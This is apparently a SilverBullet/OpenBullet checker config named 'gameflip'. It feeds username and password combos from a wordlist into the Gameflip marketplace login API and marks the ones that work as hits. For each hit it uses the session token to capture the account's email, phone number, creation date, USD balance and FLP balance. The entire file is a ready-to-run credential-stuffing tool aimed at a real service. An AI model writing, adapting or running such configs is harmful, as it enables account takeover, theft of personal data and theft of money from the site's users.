[SETTINGS]
{
  "Name": "gameflip",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-11-21T18:17:38.9459713+01:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "gameflip",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://production-gameflip.fingershock.com/marketplace/auth/identity/callback" 
  CONTENT "{\"client\":\"marketplace\",\"username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "invalid_credentials" 
    KEY "FAILURE" 
  KEYCHAIN Success OR 
    KEY "SUCCESS" 
    KEY "\"access_token\":" 

PARSE "<SOURCE>" LR "\"access_token\": \"" "\"," -> VAR "tk" 

PARSE "<SOURCE>" LR "\"me\": \"" "\"," -> VAR "me" 

REQUEST GET "https://gameflip.com/login?status=SUCCESS&type=identity&data[client]=marketplace&data[access_token]=<tk>&data[me]=<me>&data[auth_provider]=identity" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

REQUEST GET "https://production-gameflip.fingershock.com/api/v1/account/me/payment" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "authorization: Gameflip <tk>" 

PARSE "<SOURCE>" LR "email\": \"" "\"," CreateEmpty=FALSE -> CAP "Email" 

PARSE "<SOURCE>" LR "\"phone\": \"" "\"" CreateEmpty=FALSE -> CAP "Phone Number" 

PARSE "<SOURCE>" LR "created\": \"" "\"," CreateEmpty=FALSE -> CAP "Created at" 

REQUEST GET "https://production-gameflip.fingershock.com/api/v1/account/me/wallet_history?balance_only&flp" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "authorization: Gameflip <tk>" 

PARSE "<SOURCE>" LR "\"USD\":" "," CreateEmpty=FALSE -> CAP "USD" 

PARSE "<SOURCE>" LR "\"FLP\":" "}" -> VAR "FLPP" 

FUNCTION Translate 
  KEY "\"" VALUE "" 
  "<FLPP>" -> CAP "FLP" 

